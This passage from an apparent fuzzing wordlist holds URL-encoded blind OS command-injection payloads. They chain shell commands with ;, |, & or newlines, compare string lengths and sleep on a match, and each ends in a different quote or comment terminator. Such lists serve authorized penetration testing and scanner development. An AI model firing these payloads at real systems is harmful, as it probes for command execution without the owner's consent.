7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%7C%20%5B%201%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%202%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%203%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%204%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%205%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%206%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%207%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%208%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%209%20-ne%20%24%28echo%20QJDBJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20SHPKRI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20JBUKTB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%7C%20%5B%201%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%202%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%203%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%204%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%205%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%206%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%207%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%208%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%209%20-ne%20%24%28echo%20VNALZQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20USNHDT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20LWOKNM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20POHUXH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%7C%20%5B%201%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%202%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%203%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%204%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%205%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%206%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%207%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%208%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%209%20-ne%20%24%28echo%20XWHRPS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFQFHB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20DVDULN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20XSKPXU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%7C%20%5B%201%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%202%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%203%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%204%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%205%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%206%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%207%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%208%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%209%20-ne%20%24%28echo%20GSLYBH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PDOPTJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20HUZGZZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%